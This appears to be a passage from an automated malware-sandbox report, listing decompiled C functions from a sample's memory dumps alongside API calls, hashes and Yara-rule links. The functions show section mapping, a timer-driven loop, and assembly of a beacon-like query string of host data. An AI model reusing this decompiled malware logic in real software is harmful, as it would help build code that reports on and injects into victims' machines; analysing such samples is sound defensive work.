                                                                                                                                                                                                                                • Opcode ID: 2b7d1411e077f7b09cac6e034141547e8bb3976ba87b7e58bfc2688e318f53b2
                                                                                                                                                                                                                                • Instruction ID: 48de0b04a0f7c067d79c74ef0f869070fade961beafa59e5ca0f8d3d05970614
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b7d1411e077f7b09cac6e034141547e8bb3976ba87b7e58bfc2688e318f53b2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF312675A01206DFCB14CF99D890ABDBBF9FF08351B284569D801EB250E770EA41DF50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A6138A, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                                                			E00A6138A(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                                                                                                                                                                                                                0x00a6139c
                                                                                                                                                                                                                                0x00a613a2
                                                                                                                                                                                                                                0x00a613b0
                                                                                                                                                                                                                                0x00a613b7
                                                                                                                                                                                                                                0x00a613bc
                                                                                                                                                                                                                                0x00a613c2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a613c3
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00A61354,00000002,00000000,?,?,00000000,?,?,00A61354,00000002), ref: 00A613B7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: SectionView
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1323581903-0
                                                                                                                                                                                                                                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                • Instruction ID: a8d977cc27206fa963a2505c34af67db9426e0b3e47b52de14d2e0f4ab93caee
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1FF01CB690020CBFEB119FA5CC85CAFBBFDEB44394B104939B152E5190D6309E099A60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A9A565, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 201memorystringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 66%
                                                                                                                                                                                                                                			E00A9A565(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				void* _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0xa9d018; // 0x9ad51634
				asm("bswap eax");
				_t27 =  *0xa9d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0xa9d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0xa9d00c; // 0x13d015ef
				asm("bswap eax");
				_t30 =  *0xa9d2e0; // 0x453a5a8
				_t3 = _t30 + 0xa9e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3f878, _t29, _t28, _t27, _t26,  *0xa9d02c,  *0xa9d004, _t25);
				_t33 = E00A95C12();
				_t34 =  *0xa9d2e0; // 0x453a5a8
				_t4 = _t34 + 0xa9e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37; // executed
				_t38 = E00A9508C(_t91); // executed
				_t96 = _t38;
				if(_t96 != 0) {
					_t83 =  *0xa9d2e0; // 0x453a5a8
					_t6 = _t83 + 0xa9e8cc; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0xa9d270, 0, _t96);
				}
				_t97 = E00A96706();
				if(_t97 != 0) {
					_t78 =  *0xa9d2e0; // 0x453a5a8
					_t8 = _t78 + 0xa9e8d4; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0xa9d270, 0, _t97);
				}
				_t98 =  *0xa9d364; // 0x4fd95b0
				_a32 = E00A96DFA(0xa9d00a, _t98 + 4);
				_t42 =  *0xa9d308; // 0x0
				if(_t42 != 0) {
					_t74 =  *0xa9d2e0; // 0x453a5a8
					_t11 = _t74 + 0xa9e8ae; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0xa9d304; // 0x0
				if(_t43 != 0) {
					_t71 =  *0xa9d2e0; // 0x453a5a8
					_t13 = _t71 + 0xa9e885; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t46 = RtlAllocateHeap( *0xa9d270, 0, 0x800); // executed
					_t100 = _t46;
					if(_t100 != 0) {
						E00A9A425(GetTickCount());
						_t50 =  *0xa9d364; // 0x4fd95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0xa9d364; // 0x4fd95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0xa9d364; // 0x4fd95b0
						_t103 = E00A922AB(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0xa9c2ac);
							_push(_t103);
							_t62 = E00A92629();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E00A92168(0xffffffffffffffff, _t100, _v28, _v24); // executed
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E00A9651D();
								}
								HeapFree( *0xa9d270, 0, _v44);
							}
							RtlFreeHeap( *0xa9d270, 0, _t103); // executed
						}
						RtlFreeHeap( *0xa9d270, 0, _t100); // executed
					}
					HeapFree( *0xa9d270, 0, _a24);
				}
				RtlFreeHeap( *0xa9d270, 0, _t105); // executed
				return _a4;
			}


















































                                                                                                                                                                                                                                0x00a9a565
                                                                                                                                                                                                                                0x00a9a565
                                                                                                                                                                                                                                0x00a9a565
                                                                                                                                                                                                                                0x00a9a56a
                                                                                                                                                                                                                                0x00a9a570
                                                                                                                                                                                                                                0x00a9a57a
                                                                                                                                                                                                                                0x00a9a57c
                                                                                                                                                                                                                                0x00a9a57c
                                                                                                                                                                                                                                0x00a9a589
                                                                                                                                                                                                                                0x00a9a594
                                                                                                                                                                                                                                0x00a9a597
                                                                                                                                                                                                                                0x00a9a5a2
                                                                                                                                                                                                                                0x00a9a5a5
                                                                                                                                                                                                                                0x00a9a5aa
                                                                                                                                                                                                                                0x00a9a5ad
                                                                                                                                                                                                                                0x00a9a5b2
                                                                                                                                                                                                                                0x00a9a5b5
                                                                                                                                                                                                                                0x00a9a5c1
                                                                                                                                                                                                                                0x00a9a5ce
                                                                                                                                                                                                                                0x00a9a5d0
                                                                                                                                                                                                                                0x00a9a5d6
                                                                                                                                                                                                                                0x00a9a5db
                                                                                                                                                                                                                                0x00a9a5e6
                                                                                                                                                                                                                                0x00a9a5e8
                                                                                                                                                                                                                                0x00a9a5eb
                                                                                                                                                                                                                                0x00a9a5ed
                                                                                                                                                                                                                                0x00a9a5f2
                                                                                                                                                                                                                                0x00a9a5f6
                                                                                                                                                                                                                                0x00a9a5f8
                                                                                                                                                                                                                                0x00a9a5fd
                                                                                                                                                                                                                                0x00a9a609
                                                                                                                                                                                                                                0x00a9a60b
                                                                                                                                                                                                                                0x00a9a617
                                                                                                                                                                                                                                0x00a9a619
                                                                                                                                                                                                                                0x00a9a619
                                                                                                                                                                                                                                0x00a9a624
                                                                                                                                                                                                                                0x00a9a628
                                                                                                                                                                                                                                0x00a9a62a
                                                                                                                                                                                                                                0x00a9a62f
                                                                                                                                                                                                                                0x00a9a63b
                                                                                                                                                                                                                                0x00a9a63d
                                                                                                                                                                                                                                0x00a9a649
                                                                                                                                                                                                                                0x00a9a64b
                                                                                                                                                                                                                                0x00a9a64b
                                                                                                                                                                                                                                0x00a9a651
                                                                                                                                                                                                                                0x00a9a664
                                                                                                                                                                                                                                0x00a9a668
                                                                                                                                                                                                                                0x00a9a66f
                                                                                                                                                                                                                                0x00a9a672
                                                                                                                                                                                                                                0x00a9a677
                                                                                                                                                                                                                                0x00a9a682
                                                                                                                                                                                                                                0x00a9a684
                                                                                                                                                                                                                                0x00a9a687
                                                                                                                                                                                                                                0x00a9a687
                                                                                                                                                                                                                                0x00a9a689
                                                                                                                                                                                                                                0x00a9a690
                                                                                                                                                                                                                                0x00a9a693
                                                                                                                                                                                                                                0x00a9a698
                                                                                                                                                                                                                                0x00a9a6a2
                                                                                                                                                                                                                                0x00a9a6a4
                                                                                                                                                                                                                                0x00a9a6ac
                                                                                                                                                                                                                                0x00a9a6bf
                                                                                                                                                                                                                                0x00a9a6c5
                                                                                                                                                                                                                                0x00a9a6c9
                                                                                                                                                                                                                                0x00a9a6d5
                                                                                                                                                                                                                                0x00a9a6da
                                                                                                                                                                                                                                0x00a9a6e3
                                                                                                                                                                                                                                0x00a9a6f4
                                                                                                                                                                                                                                0x00a9a6f8
                                                                                                                                                                                                                                0x00a9a701
                                                                                                                                                                                                                                0x00a9a707
                                                                                                                                                                                                                                0x00a9a714
                                                                                                                                                                                                                                0x00a9a721
                                                                                                                                                                                                                                0x00a9a727
                                                                                                                                                                                                                                0x00a9a733
                                                                                                                                                                                                                                0x00a9a739
                                                                                                                                                                                                                                0x00a9a73a
                                                                                                                                                                                                                                0x00a9a73f
                                                                                                                                                                                                                                0x00a9a745
                                                                                                                                                                                                                                0x00a9a74b
                                                                                                                                                                                                                                0x00a9a752
                                                                                                                                                                                                                                0x00a9a759
                                                                                                                                                                                                                                0x00a9a75f
                                                                                                                                                                                                                                0x00a9a766
                                                                                                                                                                                                                                0x00a9a76a
                                                                                                                                                                                                                                0x00a9a775
                                                                                                                                                                                                                                0x00a9a77a
                                                                                                                                                                                                                                0x00a9a780
                                                                                                                                                                                                                                0x00a9a789
                                                                                                                                                                                                                                0x00a9a789
                                                                                                                                                                                                                                0x00a9a79a
                                                                                                                                                                                                                                0x00a9a79a
                                                                                                                                                                                                                                0x00a9a7a9
                                                                                                                                                                                                                                0x00a9a7a9
                                                                                                                                                                                                                                0x00a9a7b8
                                                                                                                                                                                                                                0x00a9a7b8
                                                                                                                                                                                                                                0x00a9a7ca
                                                                                                                                                                                                                                0x00a9a7ca
                                                                                                                                                                                                                                0x00a9a7d9
                                                                                                                                                                                                                                0x00a9a7ea

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A9A57C
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A9A5C9
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A9A5E6
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A9A609
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 00A9A619
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A9A63B
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 00A9A64B
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A9A682
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A9A6A2
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A9A6BF
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A9A6CF
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(04FD9570), ref: 00A9A6E3
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(04FD9570), ref: 00A9A701
                                                                                                                                                                                                                                  • Part of subcall function 00A922AB: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,00A9A714,?,04FD95B0), ref: 00A922D6
                                                                                                                                                                                                                                  • Part of subcall function 00A922AB: lstrlen.KERNEL32(?,?,?,00A9A714,?,04FD95B0), ref: 00A922DE
                                                                                                                                                                                                                                  • Part of subcall function 00A922AB: strcpy.NTDLL ref: 00A922F5
                                                                                                                                                                                                                                  • Part of subcall function 00A922AB: lstrcat.KERNEL32(00000000,?), ref: 00A92300
                                                                                                                                                                                                                                  • Part of subcall function 00A922AB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00A9A714,?,04FD95B0), ref: 00A9231D
                                                                                                                                                                                                                                • StrTrimA.SHLWAPI(00000000,00A9C2AC,?,04FD95B0), ref: 00A9A733
                                                                                                                                                                                                                                  • Part of subcall function 00A92629: lstrlen.KERNEL32(04FD9B98,00000000,00000000,770CC740,00A9A73F,00000000), ref: 00A92639
                                                                                                                                                                                                                                  • Part of subcall function 00A92629: lstrlen.KERNEL32(?), ref: 00A92641
                                                                                                                                                                                                                                  • Part of subcall function 00A92629: lstrcpy.KERNEL32(00000000,04FD9B98), ref: 00A92655
                                                                                                                                                                                                                                  • Part of subcall function 00A92629: lstrcat.KERNEL32(00000000,?), ref: 00A92660
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,?), ref: 00A9A752
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00A9A759
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 00A9A766
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00A9A76A
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00A9A79A
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00A9A7A9
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,?,04FD95B0), ref: 00A9A7B8
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 00A9A7CA
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,?), ref: 00A9A7D9
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3963266935-1536154274
                                                                                                                                                                                                                                • Opcode ID: 37201227350805d0aced91c3b206d5744b58fbc69ae9bcb59db0d226bfd28792
                                                                                                                                                                                                                                • Instruction ID: 868b6349b5e21420e1576e064171fce099ecf63f50fe72632fde42dfbbce53a1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37201227350805d0aced91c3b206d5744b58fbc69ae9bcb59db0d226bfd28792
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A616A71700600AFDB21DBE8EE89E5637E8EB48350F040416FA09D7261DF25E947DBA6
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A99FF2, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 150timememoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                                                			E00A99FF2(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xa9d278);
					_v20 = 0;
					_v16 = 0;
					L00A9AEC0();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xa9d2a4; // 0x2e0
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xa9d284 = 5;
						} else {
							_t68 = E00A92932(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xa9d298 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E00A9462F(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E00A9516C(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xa9d27c);
							goto L21;
						} else {
							__eflags =  *0xa9d280; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E00A9651D();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xa9d280);
								L21:
								L00A9AEC0();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0xa9d270, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                                                                                                                                                                                                0x00a99ff2
                                                                                                                                                                                                                                0x00a9a004
                                                                                                                                                                                                                                0x00a9a007
                                                                                                                                                                                                                                0x00a9a013
                                                                                                                                                                                                                                0x00a9a019
                                                                                                                                                                                                                                0x00a9a01e
                                                                                                                                                                                                                                0x00a9a185
                                                                                                                                                                                                                                0x00a9a024
                                                                                                                                                                                                                                0x00a9a024
                                                                                                                                                                                                                                0x00a9a026
                                                                                                                                                                                                                                0x00a9a02b
                                                                                                                                                                                                                                0x00a9a02c
                                                                                                                                                                                                                                0x00a9a032
                                                                                                                                                                                                                                0x00a9a035
                                                                                                                                                                                                                                0x00a9a038
                                                                                                                                                                                                                                0x00a9a046
                                                                                                                                                                                                                                0x00a9a051
                                                                                                                                                                                                                                0x00a9a054
                                                                                                                                                                                                                                0x00a9a056
                                                                                                                                                                                                                                0x00a9a063
                                                                                                                                                                                                                                0x00a9a06d
                                                                                                                                                                                                                                0x00a9a06f
                                                                                                                                                                                                                                0x00a9a074
                                                                                                                                                                                                                                0x00a9a079
                                                                                                                                                                                                                                0x00a9a084
                                                                                                                                                                                                                                0x00a9a084
                                                                                                                                                                                                                                0x00a9a07b
                                                                                                                                                                                                                                0x00a9a07b
                                                                                                                                                                                                                                0x00a9a082
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9a082
                                                                                                                                                                                                                                0x00a9a08e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9a091
                                                                                                                                                                                                                                0x00a9a095
                                                                                                                                                                                                                                0x00a9a0a0
                                                                                                                                                                                                                                0x00a9a0a0
                                                                                                                                                                                                                                0x00a9a0a7
                                                                                                                                                                                                                                0x00a9a0b0
                                                                                                                                                                                                                                0x00a9a0b7
                                                                                                                                                                                                                                0x00a9a0c0
                                                                                                                                                                                                                                0x00a9a0c3
                                                                                                                                                                                                                                0x00a9a0c6
                                                                                                                                                                                                                                0x00a9a0cb
                                                                                                                                                                                                                                0x00a9a0d0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9a0d2
                                                                                                                                                                                                                                0x00a9a0d5
                                                                                                                                                                                                                                0x00a9a0d8
                                                                                                                                                                                                                                0x00a9a0db
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9a0dd
                                                                                                                                                                                                                                0x00a9a0ec
                                                                                                                                                                                                                                0x00a9a0ec
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9a11a
                                                                                                                                                                                                                                0x00a9a11a
                                                                                                                                                                                                                                0x00a9a11f
                                                                                                                                                                                                                                0x00a9a13e
                                                                                                                                                                                                                                0x00a9a140
                                                                                                                                                                                                                                0x00a9a145
                                                                                                                                                                                                                                0x00a9a146
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9a121
                                                                                                                                                                                                                                0x00a9a121
                                                                                                                                                                                                                                0x00a9a127
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9a129
                                                                                                                                                                                                                                0x00a9a129
                                                                                                                                                                                                                                0x00a9a12e
                                                                                                                                                                                                                                0x00a9a130
                                                                                                                                                                                                                                0x00a9a135
                                                                                                                                                                                                                                0x00a9a136
                                                                                                                                                                                                                                0x00a9a14c
                                                                                                                                                                                                                                0x00a9a14c
                                                                                                                                                                                                                                0x00a9a154
                                                                                                                                                                                                                                0x00a9a15f
                                                                                                                                                                                                                                0x00a9a162
                                                                                                                                                                                                                                0x00a9a16d
                                                                                                                                                                                                                                0x00a9a16f
                                                                                                                                                                                                                                0x00a9a172
                                                                                                                                                                                                                                0x00a9a174
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9a17a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9a17a
                                                                                                                                                                                                                                0x00a9a174
                                                                                                                                                                                                                                0x00a9a127
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9a11f
                                                                                                                                                                                                                                0x00a9a0ef
                                                                                                                                                                                                                                0x00a9a0f1
                                                                                                                                                                                                                                0x00a9a0f4
                                                                                                                                                                                                                                0x00a9a0f5
                                                                                                                                                                                                                                0x00a9a0f5
                                                                                                                                                                                                                                0x00a9a0f9
                                                                                                                                                                                                                                0x00a9a103
                                                                                                                                                                                                                                0x00a9a103
                                                                                                                                                                                                                                0x00a9a109
                                                                                                                                                                                                                                0x00a9a10c
                                                                                                                                                                                                                                0x00a9a10c
                                                                                                                                                                                                                                0x00a9a112
                                                                                                                                                                                                                                0x00a9a112
                                                                                                                                                                                                                                0x00a9a18f
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A9A007
                                                                                                                                                                                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00A9A013
                                                                                                                                                                                                                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00A9A038
                                                                                                                                                                                                                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 00A9A054
                                                                                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A9A06D
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 00A9A103
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00A9A112
                                                                                                                                                                                                                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00A9A14C
                                                                                                                                                                                                                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00A958BD,?), ref: 00A9A162
                                                                                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A9A16D
                                                                                                                                                                                                                                  • Part of subcall function 00A92932: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04FD9370,00000000,?,747DF710,00000000,747DF730), ref: 00A92981
                                                                                                                                                                                                                                  • Part of subcall function 00A92932: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04FD93A8,?,00000000,30314549,00000014,004F0053,04FD9364), ref: 00A92A1E
                                                                                                                                                                                                                                  • Part of subcall function 00A92932: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00A9A080), ref: 00A92A30
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A9A17F
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                                                                                                                                • String ID: Uxt$@MxtNxt
                                                                                                                                                                                                                                • API String ID: 3521023985-2342693527
                                                                                                                                                                                                                                • Opcode ID: 61a711c163c5cfcf66b40abd94d5b3a5d0eab775c4935de4ffd4b2648cf41048
                                                                                                                                                                                                                                • Instruction ID: ebc393c5512d607de9feadc957c8b1a42d6971c7db580f39ee7a473b3a735119
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61a711c163c5cfcf66b40abd94d5b3a5d0eab775c4935de4ffd4b2648cf41048
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A55148B1A01228ABDF11DFE5DD44DEEBFB8EF19720F204216F414E6190DB309A85CBA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A61210, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81filetimeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 69%
                                                                                                                                                                                                                                			E00A61210(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
